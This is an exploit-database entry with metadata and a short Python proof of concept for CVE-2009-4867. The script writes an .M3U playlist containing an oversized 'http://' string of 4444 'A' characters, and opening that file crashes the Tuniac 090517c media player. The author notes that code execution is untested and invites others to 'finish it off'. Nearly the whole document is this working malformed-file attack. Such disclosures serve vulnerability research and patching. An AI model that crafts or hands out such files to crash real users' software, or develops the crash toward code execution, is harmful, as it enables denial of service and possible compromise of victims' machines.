Tuniac 090517c - '.m3u' Local File Crash (PoC)
Author: Dr_IDE
type: dos
platform: windows
port:
date_added: 2009-08-04
date_updated: 2017-04-01
verified: 1
codes: OSVDB-64560;CVE-2009-4867
tags:
aliases:
screenshot_url:
application_url:
#!/usr/bin/env python
##############################################################################################
#
# Tuniac v.090517c (.M3U) Crash PoC
# Found By: Dr_IDE
# http://sourceforge.net/projects/tuniac/files/tuniac/090517/Tuniac_Setup_090517c.exe/download
# Notes: Not sure if code execution is possible though. Maybe someone else can finish it off.
#
##############################################################################################
# Play around here, anything seems to knock it out.
buffer = ("http://" + "\x41" * (4444));
f = open('Dr_IDE.M3U','w');
f.write(buffer);
f.close();
# milw0rm.com [2009-08-05]